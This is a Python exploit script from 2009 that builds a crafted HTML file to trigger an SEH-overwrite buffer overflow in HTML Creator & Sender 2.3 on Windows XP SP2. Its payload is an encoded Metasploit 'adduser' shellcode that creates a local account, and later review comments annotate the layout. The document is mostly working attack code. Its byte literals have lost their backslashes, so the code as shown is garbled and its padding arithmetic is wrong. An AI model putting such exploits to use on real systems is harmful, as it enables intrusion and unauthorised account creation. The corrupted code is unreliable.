# Title : HTML Creator & Sender <= 2.3 build 697 Local BOF Exploit (SEH)
# Published : 2009-08-28
# Author : Dr_IDE
#!/usr/bin/env python
#############################################################################
#
# HTML Creator & Sender <= v2.3 Build 697 Local Buffer Overflow Exploit (SEH)
# Coded By: Dr_IDE
# Based On: http://www.milw0rm.com/exploits/9446
# Tested On: Windows XP SP2
# Download: http://www.html-email.net/
# Usage: Browse to file, enter anything for From and To, Send Email.
#
#############################################################################
import struct
# windows/adduser USER=Dr_IDE PASS=Dr_IDE
# x86/alpha_upper succeeded with size 475 (iteration=1)
# badchars = "\x00\x0a\x0d\x20\xff" at least; a bind shell was
# not working for me, so there are still some unidentified bad chars.
# Encoded payload blob. Per the comments above it is a Metasploit
# windows/adduser payload (adds a local account) passed through the
# x86/alpha_upper encoder, which is why nearly every byte falls in the
# printable 0x30-0x5a range after the short decoder stub at the start.
# NOTE(review): the backslashes appear to have been stripped when this
# page was extracted -- each "xNN" pair was almost certainly the byte
# escape "\xNN". As shown, the literal is ordinary text, so len(sc) is
# the character count of that text rather than the encoded byte length
# the comment above reports, and the padding derived from it below is
# off by the same amount. The literal is kept exactly as shown.
# Defender view: an adduser payload leaves a durable, auditable artefact
# (a new local account with the name given in the comment above), which
# is a straightforward thing to alert on.
sc = (
"x89xe1xdbxdfxd9x71xf4x59x49x49x49x49x49x43x43"
"x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41"
"x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50"
"x38x41x43x4ax4ax49x4bx4cx4bx58x51x54x43x30x43"
"x30x43x30x4cx4bx51x55x47x4cx4cx4bx43x4cx45x55"
"x42x58x43x31x4ax4fx4cx4bx50x4fx45x48x4cx4bx51"
"x4fx51x30x45x51x4ax4bx50x49x4cx4bx46x54x4cx4b"
"x45x51x4ax4ex46x51x49x50x4cx59x4ex4cx4cx44x49"
"x50x42x54x44x47x49x51x49x5ax44x4dx45x51x49x52"
"x4ax4bx4ax54x47x4bx50x54x46x44x44x44x44x35x4d"
"x35x4cx4bx51x4fx47x54x45x51x4ax4bx43x56x4cx4b"
"x44x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
"x4bx45x4cx4cx4bx43x31x4ax4bx4bx39x51x4cx51x34"
"x44x44x49x53x51x4fx46x51x4cx36x43x50x51x46x42"
"x44x4cx4bx50x46x50x30x4cx4bx47x30x44x4cx4cx4b"
"x44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4cx49x4a"
"x58x4dx53x49x50x43x5ax50x50x43x58x4ax50x4dx5a"
"x43x34x51x4fx45x38x4dx48x4bx4ex4cx4ax44x4ex51"
"x47x4bx4fx4dx37x42x43x42x4dx43x54x46x4ex42x45"
"x43x48x43x55x47x50x46x4fx43x53x47x50x42x4ex43"
"x55x44x34x47x50x43x45x42x53x43x55x44x32x47x50"
"x50x44x42x52x51x4fx50x49x50x44x47x35x47x50x51"
"x54x44x32x51x4fx51x59x51x54x47x35x51x30x46x4f"
"x47x31x47x34x51x54x47x50x46x46x51x36x51x30x42"
"x4ex45x35x43x44x47x50x42x4cx42x4fx45x33x45x31"
"x42x4cx45x37x44x32x42x4fx43x45x44x30x51x30x51"
"x51x43x54x42x4dx43x59x42x4ex45x39x44x33x43x44"
"x43x42x45x31x43x44x42x4fx42x52x44x33x47x50x50"
"x44x44x32x51x4fx47x39x47x34x47x35x47x50x46x4f"
"x47x31x50x44x47x34x43x30x45x5ax41x41")
# Pieces of the SEH-overwrite layout assembled into `payload` below.
# NOTE(review): every literal in this run has lost its backslashes in
# extraction the same way the `sc` literal above has -- read "xNN" as
# the byte escape "\xNN" and a bare "n" at a line end as "\n". The
# literals are kept exactly as shown.
# `jump` fills the next-SEH slot: EB 06 is a two-byte short jump over the
# four-byte handler address that follows it, padded with two NOPs.
jump = ("xEBx06x90x90")
# Trailing filler so the whole payload reaches a fixed size; 4616 is
# presumably the overflow length the author measured. Because len(sc)
# counts characters of the garbled text rather than payload bytes, this
# arithmetic no longer reproduces the original layout.
junk = ("x43" * (4616 - len(sc)))
# Overwritten SEH handler address: a hard-coded pointer into WS2_32.DLL
# as loaded on Windows XP SP2 (presumably a POP/POP/RET gadget, the usual
# SEH pivot -- not verifiable from this file). This is the fragile,
# build-specific part of the technique; SafeSEH/SEHOP, DEP and ASLR on
# later Windows releases defeat it outright.
retn = ("xFAx89xABx71") #WS2_32.DLL XPSP2
# Small NOP sled between the handler address and the encoded shellcode.
nops = ("x90" * 8)
# Don't mess with the headers, we need to create a valid HTML file
header1 = ("<HTML>n<HEAD>n</HEAD>n<BODY>n<img src = "")
# Layout: 56 filler bytes (inferred to be the offset at which the SEH
# record is reached), then nSEH, SEH, the NOP sled, the shellcode and
# the trailing padding. The whole thing lands inside the img src
# attribute, so the dropped file is an HTML document with one
# abnormally long (several thousand characters) attribute value --
# a usable heuristic for content inspection.
payload = ("x41" * 56 + jump + retn + nops + sc + junk)
header2 = ("">n</BODY>n</HTML>n")
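# Write the crafted HTML document to the working directory.
#
# Changes from the original: the bare `except:` also swallowed
# KeyboardInterrupt/SystemExit and hid the reason a write failed, and
# the manual close() was skipped whenever write() raised. A context
# manager closes the file on every path and the handler is narrowed to
# the I/O errors open()/write() can actually raise (IOError is listed
# alongside OSError so the script stays valid on Python 2, which the
# shebang and the 2009 date suggest it targets).
# NOTE(review): the message literals below lost their backslashes in
# extraction (a bare "n" at the ends was "\n"); they are kept as shown.
# The original indentation was also flattened; it is restored here.
try:
    with open("Dr_IDE-Evil.html", "w") as f1:
        f1.write(header1 + payload + header2)
    print("nExploit file created!n")
except (IOError, OSError) as exc:
    # Report what went wrong instead of a bare "Error".
    print("Error: %s" % exc)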